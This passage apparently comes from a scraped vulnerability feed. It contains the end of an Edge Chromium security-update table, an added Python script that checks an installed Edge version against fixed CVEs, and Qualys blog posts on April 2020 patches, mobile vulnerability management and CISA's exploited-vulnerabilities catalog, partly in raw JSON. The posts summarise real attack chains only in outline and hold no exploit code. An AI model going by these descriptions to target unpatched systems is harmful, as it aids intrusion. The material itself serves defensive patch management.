79.0.309.68 | 1/17/2020 | 79.0.3945.130 | Critical | [CVE-2020-6378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6378>), [CVE-2020-6379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6379>), [CVE-2020-6380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6380>), [CVE-2020-0601](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0601>)

* CVEs in **bold** have been reported to be exploited in the wild.

**How can I see the version of the browser?**

 1. In your Microsoft Edge browser, click the three dots (...) at the far right of the window
 2. Click on **Help and Feedback**
 3. Click on **About Microsoft Edge**

Source: Microsoft, "Chromium Security Updates for Microsoft Edge (Chromium-Based)", published 2020-01-28.
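The table maps each Edge release to the Chromium CVEs it fixes, and the steps above tell you where to read the installed build, but the comparison itself is easy to get wrong: a plain string compare sorts 80.0.361.109 before 80.0.361.62. The script below is an added example, not code from Microsoft or from the advisory. It parses rows written in the same `Edge version | date | Chromium version | severity | CVE links` layout as the table above, compares an installed version numerically against the release that first shipped each fix, and keeps the in-the-wild marker (bold plus a trailing `*`). The three rows embedded in it are copied from the table as constructed sample input; the installed version string is assumed to come from About Microsoft Edge or from an inventory tool.

```python
"""Check an installed Edge (Chromium-based) build against an advisory fix table.

Added example, not part of the Microsoft advisory. Input rows use the table's
own layout: "Edge version | date | Chromium version | severity | CVE links".
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: three rows copied from the advisory table above.
SAMPLE_TABLE = """\
86.0.622.69 | 11/13/2020 | 86.0.4240.198 | High | [**CVE-2020-16013**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013>) *, [**CVE-2020-16017**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16017>) *
80.0.361.62 | 2/25/2020 | 80.0.3987.122 | High | [CVE-2020-6407](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6407>), [**CVE-2020-6418**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418>) *
80.0.361.57 | 2/20/2020 | 80.0.3987.116 | High | [CVE-2020-6383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6383>), [CVE-2020-6384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6384>), [CVE-2020-6386](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6386>)
"""

# One CVE link as written in the table. Optional "**" around the ID and an
# optional trailing " *" are the advisory's exploited-in-the-wild marker.
CVE_LINK = re.compile(r"\[\*{0,2}(CVE-\d{4}-\d{4,})\*{0,2}\]\(<[^>]*>\)(\s*\*)?")

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'80.0.361.62' -> (80, 0, 361, 62); tuples compare component-wise, not as strings."""
    return tuple(int(part) for part in text.strip().split("."))


def parse_table(text: str) -> List[Dict]:
    """Turn table rows into dicts; 'cves' is a list of (cve_id, exploited_in_the_wild)."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        # The CVE column is last and never contains '|', so split at most 4 times.
        edge, date, chromium, severity, cves = (c.strip() for c in line.split("|", 4))
        rows.append({
            "edge": edge,
            "edge_version": parse_version(edge),
            "date": date,
            "chromium": chromium,
            "severity": severity,
            "cves": [(m.group(1), m.group(2) is not None) for m in CVE_LINK.finditer(cves)],
        })
    return rows


def fixed_in(rows: List[Dict], cve: str) -> Optional[str]:
    """Edge version that first shipped the fix for `cve`, or None if the table lacks it."""
    for row in rows:
        if any(name == cve for name, _ in row["cves"]):
            return row["edge"]
    return None


def is_exposed(rows: List[Dict], installed: str, cve: str) -> Optional[bool]:
    """True if `installed` predates the fix, False if it carries it, None if untracked.

    None is deliberately not False: a CVE missing from the table is unknown, not safe.
    """
    fix = fixed_in(rows, cve)
    if fix is None:
        return None
    return parse_version(installed) < parse_version(fix)


def missing_fixes(rows: List[Dict], installed: str) -> List[Tuple[str, str, bool]]:
    """(cve_id, fix version, exploited_in_the_wild) for every fix `installed` lacks."""
    have = parse_version(installed)
    return [
        (name, row["edge"], itw)
        for row in rows
        if row["edge_version"] > have
        for name, itw in row["cves"]
    ]


if __name__ == "__main__":
    table = parse_table(SAMPLE_TABLE)
    for cve, fix, itw in missing_fixes(table, "80.0.361.57"):
        print(f"{cve}: fixed in {fix}{'  (exploited in the wild)' if itw else ''}")
```

A build equal to or newer than the listed release carries that release's fixes, so `is_exposed` returns `False` for 80.0.361.62 itself. The table only covers CVEs Microsoft listed in this advisory; anything else comes back as `None` rather than as "patched", which is the answer a fleet report should show rather than silently treating unknown as safe.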
Advisory ID MS:ADV200002, last modified 2021-01-21: https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV200002

From the Qualys blog:

This month's Microsoft Patch Tuesday addresses 113 vulnerabilities, 19 of them rated Critical. The 19 Critical vulnerabilities cover the Adobe Font Manager Library (0-day), SharePoint, Hyper-V, Scripting Engines, Media Foundation, Microsoft Graphics, Windows Codecs, and Dynamics Business Central. Adobe released patches today for ColdFusion, After Effects, and Digital Editions.

### Workstation Patches

The Scripting Engine, Adobe Font Manager Library, Media Foundation, Microsoft Graphics, and Windows Codecs patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser.
This includes multi-user servers that are used as remote desktops for users.

### Windows Kernel Privilege Escalation

While listed only as Important, there is also an Actively Attacked privilege escalation vulnerability ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) in the Windows Kernel. Privilege escalation vulnerabilities are often "chained" with other vulnerabilities, resulting in a full system compromise. This patch should be prioritized across all Windows devices.

### Adobe Font Manager Library 0-day

Microsoft patched two Actively Attacked vulnerabilities ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>)) in the Adobe Font Manager Library that were [announced](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/25/automatically-discover-prioritize-and-remediate-windows-adobe-type-manager-library-remote-code-execution-vulnerability-adv200006-using-qualys-vmdr>) in March. Windows 10 is only partially mitigated (a successful attack there is confined to an AppContainer sandbox with limited privileges), so all Windows workstations should be prioritized for patching.

### Hyper-V Hypervisor Escape

A remote code execution vulnerability ([CVE-2020-0910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910>)) is patched in Hyper-V that would allow an authenticated user on a guest system to run arbitrary code on the host system. Microsoft rates exploitation of this vulnerability as less likely, but these patches should still be prioritized for all Hyper-V hosts.

### SharePoint

Microsoft has also released patches for SharePoint covering four RCE vulnerabilities ([CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>), [CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>), [CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>), [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>)) and one XSS ([CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>)). The four RCEs are triggered by uploading a malicious application package. These patches should be prioritized for all SharePoint servers.

### Dynamics Business Central RCE

Similar to [last month's release](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Dynamics Business Central is affected by a Remote Code Execution vulnerability ([CVE-2020-1022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1022>)) that could allow attackers to execute arbitrary shell commands on a target system. While this vulnerability is labeled "Exploitation Less Likely", the target is likely a critical server, so it should be prioritized across all Dynamics BC/NAV systems.

### Adobe

Adobe issued patches today covering multiple vulnerabilities in [ColdFusion](<https://helpx.adobe.com/security/products/coldfusion/apsb20-18.html>), [After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb20-21.html>), and [Digital Editions](<https://helpx.adobe.com/security/products/Digital-Editions/apsb20-23.html>). The ColdFusion patches are labeled [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), the others [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>). All patches are labeled "Important."

While none of the vulnerabilities disclosed in Adobe's release are known to be Actively Attacked today, all patches should be prioritized on systems with these products installed.

Patch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of Patch Tuesday.

Source: Qualys blog, "April 2020 Patch Tuesday – 113 Vulns, 19 Critical, Zero-Day Patches, SharePoint, Adobe ColdFusion", published 2020-04-14: https://blog.qualys.com/category/vulnerabilities-research

From the Qualys blog:

As mobile devices have become ubiquitous in almost every business process, whether in bank branches, manufacturing sites or retail stores, they now host business applications and data that are subject to regulatory compliance and security requirements. With access to critical corporate resources inside the corporate network, these mobile devices have become critical assets for the organization.

### Mobile Attack Surface Challenges

Alongside this trend, there has been a drastic rise in Android, iOS, and iPadOS vulnerabilities and an increased number of vulnerable apps distributed from authorized app stores.
Through these vectors, mobile devices have become preferred targets for attackers to gain an entry point into corporate networks. Last year, for example, [900 million Apple iOS users were affected](<https://www.forbes.com/sites/gordonkelly/2020/05/13/apple-iphone-exploit-vulnerability-ios-13-mail-problem-update-iphone-11-pro-max-u-iphone-xs-max-xr-upgrade/?sh=45195bbc07b7>) by iOS mail app vulnerability CVE-2020-9819 and CVE-2020-9818 exploit. Zecops [demonstrated how to exploit](<https://blog.zecops.com/vulnerabilities/seeing-maildemons-technique-triggers-and-a-bounty/>) these vulnerabilities (MailDemon) by sending oversized email to victims\u2019 devices.\n\nIn another attack, Android mobile devices [were targeted](<https://www.zdnet.com/article/google-reveals-sophisticated-windows-android-hacking-operation/>) using the Google Chrome app vulnerability CVE-2020-6418, a type of bug that incorrectly implements relevant security checks. The attacker tricked victims into visiting a specially crafted web page that gave the attacker an initial foothold on the victim\u2019s device via their browser. The attacker then deployed OS-level vulnerability CVE-2019-2215 to gain privileged control of the victim\u2019s device including access to their data and the corporate network.\n\nIn both cases, the attacks were successful because the organizations were using a traditional vulnerability scanning approach for mobile devices. This approach fails to provide holistic security for mobile devices because it requires devices to connect to the VPN or the organization\u2019s network in order to be scanned for vulnerabilities or patched. Mobile Device Management (MDM) also fails in this case because its \u2018policy-based prevention\u2019 does not assess devices or the apps running on them for the latest vulnerabilities, and it lacks knowledge of the security posture of the device and does not provide flexible patching. 
\n\nOrganizations are looking for a solution which provides continuous visibility into mobile devices across the enterprise, continuous visibility into the vulnerability and misconfiguration posture of the device and apps, and a workflow for prioritized updates and patching.\n\n### Introducing Qualys VMDR for Mobile Devices\n\nBuilt on the FedRAMP-authorized [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>), [Qualys VMDR for Mobile Devices](<https://www.qualys.com/vmdr-mobile-devices>) extends vulnerability management, detection and response capabilities to mobile device platforms such as Android, iOS, and iPadOS. Qualys Cloud Agent for Android, iOS and iPadOS, available on Google Play Store and Apple App Store, provides continuous visibility, security and patch orchestration for your mobile platforms.\n\nTo learn more about this solution, watch the webinar on March 10: [Seamlessly Expand Vulnerability & Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>).\n\n#### Continuous Visibility and Monitoring of Mobile Devices Connecting to Your Network\n\nKnowing your mobile devices and monitoring their connections to your corporate network is fundamental to their security. 
With cloud agents deployed on your mobile devices, you get real-time visibility of all the mobile devices across your enterprise, including critical hardware and software details like firmware, OS, and installed applications, along with location and network information.\n\nThis mobile device inventory comes as a part of [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>).\n\nGain in-depth visibility into mobile devices across your enterprise\n\n#### Real-Time Visibility into Vulnerabilities and Critical Device Settings\n\nWith best-in-class vulnerability assessment for Android, iOS and iPadOS devices, Qualys VMDR for Mobile Devices enables:\n\n * Device vulnerability and exploit assessment covering vulnerabilities from 2016 to the latest for Android, iOS, and iPadOS, providing insights into vulnerable OS versions with CVE details and detection of jailbroken/rooted devices,\n * Detection of critical device settings such as encryption disabled, password removed/disabled, Bluetooth settings, etc.,\n * Assessment of app vulnerabilities covering vulnerabilities from 2016 to the latest, such as Google Chrome browser vulnerabilities, along with the detection of potentially harmful apps, and\n * Insights into network vulnerabilities and detection of devices connected to insecure or open Wi-Fi networks.\n\nQualys VMDR helps expand your vulnerability management program with configuration assessment by continuously monitoring the critical mobile device configurations as recommended by [National Security Agency (NSA) best practices](<https://www.nsa.gov/What-We-Do/Cybersecurity/Telework-and-Mobile-Security-Guidance/>), such as Bluetooth status, location services, app trusted status, and more.\n\nReal-time visibility into vulnerabilities\n\nReal-time visibility into critical settings\n\n#### Remote Response and Seamless Patch 
Orchestration\n\nTwo of the biggest response challenges in the mobile world are:\n\n * Performing remote actions when the mobile device is not on the VPN or network, i.e. when traditional vulnerability management approaches are not possible, and\n * Determining the appropriate mitigation action, which requires time-consuming research to map application updates to vulnerabilities and then either deploy those updates or uninstall the risky apps.\n\nQualys VMDR for Mobile Devices automatically and continuously correlates the vulnerabilities of Android apps available on Google Play Store with the appropriate application updates, significantly decreasing your remediation response time. IT and remediation teams can schedule and deploy those patches from Google Play Store via the seamless orchestration provided by VMDR, or they can uninstall vulnerable apps.\n\nBased on the security posture of the device, security teams can take action on all at-risk mobile devices simultaneously, even if the devices are not connected to the VPN or corporate network, leveraging over-the-air, out-of-the-box controls to lock devices, change passcodes, reset devices in critical cases, or even de-enroll the device.\n\nSeamless patch orchestration with tracking of patch status\n\nUninstall the vulnerable app\n\nPerform remote actions on the vulnerable devices\n\n#### Vulnerability Posture of Mobile Devices AND Servers in a Single Pane of Glass\n\nOne of the key requirements for vulnerability risk management teams and management is visualization of vulnerability and security posture across hybrid environments, from datacenter servers to endpoints to mobile devices. 
With mobile data flowing to the Qualys Cloud Platform via VMDR for Mobile Devices, your vulnerability and security teams can continuously inventory all your assets, including mobile devices, in a consolidated manner and gain insights into the vulnerability and misconfiguration posture of your servers and mobile devices in a single pane of glass.\n\nGain visibility into the security posture of different types of assets in a single pane of glass.\n\n### Visibility, Assessment, Correlation and Orchestration\n\nWith the growth of mobile devices and the increasing attack surface and data exposure risks, security teams are looking for a solution which goes beyond traditional mobile vulnerability scanning tools. Qualys VMDR for Mobile Devices extends the power of vulnerability & patch management to Android, iOS and iPadOS devices for: \n\n * Comprehensive visibility into mobile devices, installed apps, and configurations, even if they are not on VPN or network,\n * Continuous vulnerability and end-of-life assessment of devices, OSs, and applications along with monitoring for potentially harmful applications,\n * Automatic correlation of vulnerabilities with apps and Android patches, and\n * Orchestration of appropriate response actions such as deploying patches from Google Play Store or uninstalling vulnerable apps.\n\n### Learn More\n\n * Webinar March 10: [Seamlessly Expand Vulnerability & Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>)\n * [Start your free trial](<https://www.qualys.com/try-vmdr-mobile-devices>)\n * [About VMDR for Mobile Devices](<https://www.qualys.com/apps/vulnerability-management-detection-response/mobile-devices>)\n * [User guide](<https://www.qualys.com/docs/qualys-sem-user-guide.pdf>)\n * [Qualys extends the power of VMDR to Android and iOS/iPadOS mobile devices](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-introduces-vmdr-for-mobile-devices>)", "cvss3": {}, "published": 
"2021-02-10T21:17:00", "type": "qualysblog", "title": "Expand Your Vulnerability & Patch Management Program to Mobile Devices with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2215", "CVE-2020-6418", "CVE-2020-9818", "CVE-2020-9819"], "modified": "2021-02-10T21:17:00", "id": "QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. 
It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps the catalog\u2019s CVEs to the available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase and tags them with the RTI field \u201cCISA Exploited\u201d. This will remain an ongoing effort, as CISA frequently adds the latest CVEs to the catalog as part of its regular feeds.\n\nFor these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. 
The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022), we recommend searching with QQL (Qualys Query Language) for the QIDs released by Qualys, as shown here: **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and your remediation status in real time. 
With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in the [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help comply with the aggressive remediation timelines set by CISA in the directive. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization get there. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help an organization of any size efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
